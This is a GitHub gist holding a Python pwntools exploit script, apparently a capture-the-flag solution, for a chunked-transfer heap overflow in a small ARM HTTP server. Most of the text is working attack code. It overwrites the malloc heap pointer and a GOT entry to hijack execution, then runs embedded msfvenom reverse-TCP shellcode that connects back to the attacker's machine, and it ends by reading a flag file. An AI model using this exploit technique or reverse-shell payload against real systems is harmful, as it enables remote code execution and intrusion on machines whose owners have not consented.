Skip to content

Instantly share code, notes, and snippets.

Last active November 2, 2018 09:03
  • Star 2 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
What would you like to do?
#!/usr/bin/env python2
# pylint: skip-file
When performing a chunked transfer, realloc doesnt take into account the size of the headers allowing an overflow.
As the initial heap (0x100) is located inline we can overwrite the current heap location.
* overwrite __malloc_heap to point to our fake heap
* our fake heap size is huge so that memory os returned near the GOT
* overwrite memchr got with shellcode address
* win
from pwn import *
def exploit():
# send a request to get the heap adress
p.send("G / H\n\n\n")
p.recvuntil("hello world")
if len(sys.argv) > 1:
r.recvuntil("recv: 00004 (0x")
offset = int(r.recvuntil(")", drop=True), 16)
offset = int(raw_input(), 0)
# address of fake __malloc_heap+4
offset += 0x100
payload = "\x00" + p32(0) + p32(offset) + p32(offset - 0x11D00)
payload = payload.ljust(0x30, "\x00")
# start a chunked transfer
p.send("P /echo H\nTransfer-Encoding:chunked\nA:{}\n\n".format("A"*8))
# overwrite __malloc_heap with fake one
# fake size will cause malloc to return binary got
p.send("{}\n{}\n".format(hex(len(payload))[2:], payload))
# overwrite memchr with payload addrds
# section is rwx
payload2 = cyclic(136)
payload2 += p32(0x00011e04)
# add reverse tcp shell for armv6
payload2 += asm(shellcraft.nop()*0x10)
payload2 += buf
Connection from
cat /flag.txt
if __name__ == "__main__":
context.terminal=["tmux", "sp", "-h"]
context.arch = "arm"
context.os = "linux"
# msfvenom --arch armle --payload linux/armle/shell_reverse_tcp --format py --platform linux LPORT=14612
buf = ""
buf += "\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x05\x20\x81\xe2\x8c"
buf += "\x70\xa0\xe3\x8d\x70\x87\xe2\x00\x00\x00\xef\x00\x60"
buf += "\xa0\xe1\x60\x10\x8f\xe2\x10\x20\xa0\xe3\x8d\x70\xa0"
buf += "\xe3\x8e\x70\x87\xe2\x00\x00\x00\xef\x06\x00\xa0\xe1"
buf += "\x00\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00\x00\xef\x06"
buf += "\x00\xa0\xe1\x01\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00"
buf += "\x00\xef\x06\x00\xa0\xe1\x02\x10\xa0\xe3\x3f\x70\xa0"
buf += "\xe3\x00\x00\x00\xef\x24\x00\x8f\xe2\x04\x40\x24\xe0"
buf += "\x10\x00\x2d\xe9\x0d\x20\xa0\xe1\x24\x40\x8f\xe2\x10"
buf += "\x00\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00"
buf += "\x00\xef\x02\x00\x39\x14\x34\x0f\xb7\x95\x2f\x62\x69"
buf += "\x6e\x2f\x73\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00"
buf += "\x73\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
buf += "\x00\x00\x00"
if len(sys.argv) > 1:
r = remote("", 1337)
r.sendlineafter(">>", "0")
r.recvuntil("Your port: ", drop=True)
port = int(r.recvline(keepends=False))
p = remote("", port)
p = remote("localhost", 8888)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment